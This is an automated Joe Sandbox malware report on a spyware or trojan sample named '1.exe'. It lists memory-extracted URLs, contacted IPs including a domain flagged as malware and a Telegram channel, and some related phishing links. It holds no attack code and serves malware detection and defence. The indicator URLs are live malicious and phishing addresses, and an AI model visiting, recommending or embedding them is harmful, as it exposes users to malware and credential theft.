https://docs.google.com/	chrome.exe, 00000002.00000003.1792011581.000060E80047C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com/settings?referrer=CHROME_NTP	chrome.exe, 00000002.00000002.1890498248.000060E800998000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1890601480.000060E8009C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4324?	chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://unisolated.invalid/	chrome.exe, 00000002.00000002.1890680187.000060E8009CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000002.00000003.1806881310.000060E801100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806696090.000060E80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/35863	chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/tips/	chrome.exe, 00000002.00000002.1893379802.000060E800D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1890407137.000060E80096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889876909.000060E800860000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/8229E	chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000002.00000003.1823613584.000060E8012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819245674.000060E801380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819451048.000060E801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819178022.000060E801378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1896591707.000060E801318000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819303349.000060E801388000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/8j	chrome.exe, 00000002.00000003.1828850032.000060E8014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1829248687.000060E8014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1828949603.000060E8014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1828887658.000060E8014F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.0e0.jp.eu.orgK	1.exe, 00000001.00000002.2305906778.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/6929	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ccsca2021.ocsp-certum.com05	1.exe	false		high
http://anglebug.com/5281	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	1.exe	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	1.exe, 00000001.00000002.2305906778.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, uai5x4.1.dr	false		high
https://issuetracker.google.com/255411748	chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892265441.000060E800C14000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 00000002.00000002.1892422967.000060E800C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889548993.000060E8007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887760061.000060E8004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889499150.000060E8007A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?q=	chrome.exe, 00000002.00000002.1892115948.000060E800BE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1890498248.000060E800998000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000002.00000003.1812254210.000060E800F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1888394999.000060E800628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1888241692.000060E8005E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000002.00000003.1792011581.000060E80047C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000002.00000003.1806458739.000060E800F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805040618.000060E801018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805142658.000060E801078000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806376008.000060E800A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806415638.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886716175.000060E8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805106096.000060E801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806335993.000060E800C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805172416.000060E800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805213453.000060E801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806696090.000060E80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t.me/g02f04ot0yikamMozilla/5.0	1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300403212.00000000009DE000.00000040.00000400.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.ico	chrome.exe, 00000002.00000003.1834567304.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806668384.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1825181851.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1802599919.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892049335.000060E800BC0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	1.exe, 00000001.00000002.2302254778.0000000003576000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	1.exe, 00000001.00000002.2305906778.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, uai5x4.1.dr	false		high
https://issuetracker.google.com/161903006	chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892265441.000060E800C14000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	1.exe, 00000001.00000002.2302254778.0000000003576000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-1.corp.google.com/	chrome.exe, 00000002.00000003.1792011581.000060E80047C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000002.00000002.1886868338.000060E800300000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.ico	chrome.exe, 00000002.00000002.1892115948.000060E800BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000002.00000002.1895912295.000060E801080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887904227.000060E8004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889029768.000060E800710000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000002.00000002.1895573926.000060E800F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1818942348.000060E800F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1834408757.000060E800F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806458739.000060E800F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887720076.000060E800488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889499150.000060E8007A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://plus.google.com	chromecache_77.4.dr	false		high
http://anglebug.com/3078	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000002.00000002.1886260559.000060E80020C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000002.00000002.1895912295.000060E801080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887904227.000060E8004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889029768.000060E800710000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 00000002.00000002.1882852452.000060E80001C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-preprod.corp.google.com/	chrome.exe, 00000002.00000002.1886868338.000060E800300000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	1.exe, 00000001.00000002.2302254778.0000000003492000.00000004.00000020.00020000.00000000.sdmp, vk6xlx.1.dr	false		high
https://clients4.google.com/chrome-sync	chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	false		high
http://unisolated.invalid/a	chrome.exe, 00000002.00000002.1890680187.000060E8009CC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892265441.000060E800C14000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.0e0.jp.eu.org	1.exe, 00000001.00000003.1685584321.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1727662440.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://google-ohttp-relay-join.fastly-edge.com/$j	chrome.exe, 00000002.00000003.1828850032.000060E8014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1829248687.000060E8014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1828949603.000060E8014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1828887658.000060E8014F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/J	chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5007	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887626629.000060E800470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 00000002.00000002.1887158023.000060E800384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000002.00000003.1807042227.000060E800C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1856946078.000060E800CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1801599550.000060E800CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1804009643.000060E800F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1803025141.000060E800F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1801520645.000060E800C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1812254210.000060E800F30000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/search?q=&addon=opensearch	chrome.exe, 00000002.00000003.1834567304.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806668384.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1825181851.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1802599919.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892049335.000060E800BC0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/5j	chrome.exe, 00000002.00000003.1828850032.000060E8014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1829248687.000060E8014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1828949603.000060E8014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1828887658.000060E8014F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892049335.000060E800BC0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000002.00000002.1892115948.000060E800BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7724ty	chrome.exe, 00000002.00000002.1889703732.000060E80080C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/presentation/:	chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4384	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 00000002.00000002.1887459577.000060E80040C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://subca.ocsp-certum.com02	1.exe	false		high
http://anglebug.com/3970	chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
http://subca.ocsp-certum.com01	1.exe	false		high
https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW	chrome.exe, 00000002.00000002.1887720076.000060E800488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889499150.000060E8007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1894798929.000060E800E28000.00000004.00000800.00020000.00000000.sdmp	false		high
http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs	chrome.exe, 00000002.00000002.1889924354.000060E800880000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	plus.l.google.com	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
116.202.180.73	www.0e0.jp.eu.org	Germany	24940	HETZNER-ASDE	true
172.217.16.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1619385
Start date and time:	2025-02-19 20:55:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/36@9/7
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 90% Number of executed functions: 60 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.74.206, 64.233.167.84, 142.250.181.238, 172.217.18.3, 142.250.185.78, 172.217.16.202, 142.250.181.234, 142.250.185.106, 142.250.186.106, 142.250.185.170, 142.250.185.74, 142.250.185.138, 142.250.186.138, 216.58.206.42, 216.58.206.74, 142.250.185.202, 142.250.185.234, 142.250.74.202, 172.217.23.106, 142.250.186.74, 142.250.186.42, 88.221.110.129, 142.250.185.174, 2.17.190.73, 2.19.106.160, 20.12.23.50, 20.242.39.171, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
Execution Graph export aborted for target 1.exe, PID 7268 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	BAD.html	Get hash	malicious	Unknown	Browse
	EFT Remittance_(Rtotino)CQDM.html	Get hash	malicious	Unknown	Browse
	http://www.antham.com/	Get hash	malicious	Unknown	Browse
	https://certificate.hypnotherapy-training.co.nz	Get hash	malicious	Unknown	Browse
	https://www.google.com/url?q=https%3A%2F%2Fyir.myvnc.com%2Fosh%2F&sa=D&sntz=1&usg=AOvVaw0upYvHpDviVW9Wdi9s8ilT#SILENTCODERSLIMAHURUFE-SUREOSHAYmdvZWRlY2tlQHN3ZWVwaW5nY29ycC5jb20=	Get hash	malicious	Unknown	Browse
	http://content.vibly.it	Get hash	malicious	Unknown	Browse
	https://www.envoice.in/invoice/attachment?token=KVuGLoehNae1TTmcoP5fURVZa2Clb4uoU54ZN62dm5bt4GI5SbJSW4i0gvqX8OqC8du8FWxO1FyKUMdXWD85tucV981ZqOB32A7Io9cUN81nVPlXDT5TwIo4bnOJevlP&obfuscatedFileName=1739953701-K0XOHIfac9FrSomhOQ0b	Get hash	malicious	HTMLPhisher	Browse
	http://liberrex.com	Get hash	malicious	Unknown	Browse
	https://7pj1.chuseruc.ru/Idsj/	Get hash	malicious	HTMLPhisher	Browse
	https://sapiyon.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.20.3	Get hash	malicious	Unknown	Browse
149.154.167.99	http://45.142.208.144.sslip.io/blog/	Get hash	malicious	Unknown	Browse	telegram.org/img/emoji/40/F09F9889.png
	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
